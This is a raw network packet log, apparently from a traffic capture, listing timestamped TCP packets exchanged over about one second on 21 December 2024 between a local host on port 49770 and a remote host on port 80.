                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.369204044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.369255066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.369333029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.369384050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.370199919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.370254040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.370373011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.370429039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.371221066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.371270895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.371362925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.371412039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.372260094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.372313023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.372370005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.372421980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.373208046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.373260975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.373325109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.373372078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.374227047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.374284983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.374349117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.374402046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.375160933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.375214100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.514806986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.514873981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.514959097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.515008926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.515357018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.515408993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.515474081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.515526056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.516321898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.516371012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.516514063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.516558886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.517344952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.517405033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.517452955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.517501116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.518390894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.518439054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.518569946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.518616915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.519602060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.519656897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.519776106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.519819975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.520576000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.520628929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.520708084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.520755053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.521522999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.521573067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.521596909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.521650076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.522515059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.522568941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.522629023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.522680998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.523437023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.523490906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.523490906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.523541927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.524475098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.524525881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.524579048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.524631023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.525388956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.525516987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.525572062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.525599957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.526453018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.526508093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.526572943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.526626110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.527350903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.527400970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.527460098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.527504921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.528342962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.528393030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.528470993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.528521061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.529351950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.529398918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.529496908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.529547930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.530334949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.530383110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.530473948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.530524015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.531373024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.531430006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.531599045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.531650066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.532399893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.532466888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.532531977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.532586098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.533395052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.533457994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.533500910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.533550978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.534353971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.534408092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.534475088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.534527063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.535367966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.535429955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.535492897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.535543919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.536355972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.536412001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.536474943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.536529064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.537343025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.537394047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.537475109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.537524939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.538366079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.538419008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.538481951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.538533926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.539381027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.539433002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.539494991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.539546967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.540354013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.540400982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.540486097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.540535927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.541421890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.541479111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.541531086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.541582108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.542367935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.542418957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.542526007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.542578936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.543390036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.543442011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.543495893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.543545961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.544425964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.544477940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.544557095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.544608116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.545413017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.545464993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.545519114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.545569897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.546359062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.546415091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.546493053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.546545982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.547422886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.547482014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.547542095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.547594070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.548367977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.548418045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.548481941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.548535109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.549360991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.549427032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.549504995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.549556971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.550353050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.550405979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.550468922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.550519943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.551382065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.551434040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.551486969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.551537037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.552356958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.552423954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.552544117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.552594900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.553369999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.553421974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.553484917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.553534031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.554346085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.554399967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.554497957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.554554939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.555372000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.555423975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.555552959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.555600882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.556421041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.556476116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.556606054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.556655884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.557337999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.557394028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.557456970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.557507992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.558389902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.558442116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.558506966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.558549881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.559443951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.559488058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.559568882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.559619904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.560409069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.560467958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.560533047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.560585976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.561403036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.561460018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.561496973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.561547041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.562360048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.562412024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.562491894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.562589884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.563401937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.563450098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.563529968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.563582897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.564661026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.564714909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.564910889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.564959049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.565536022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.565592051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.565797091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.565850019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.566382885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.566463947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.566493988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.566534042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.567331076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.567378044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.707479000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.707583904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.707586050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.707628965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.707882881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.707932949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.708012104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.708055019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.708647013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.708694935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.709022045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.709072113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.709150076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.709197998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.709887981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.709937096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.710016012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.710066080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.710880041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.710927963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.711009979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.711057901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.711882114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.711930037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.712007046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.712054968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.712910891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.712959051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.713069916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.713116884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.713939905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.713989973 CET4977080192.168.2.431.41.244.11
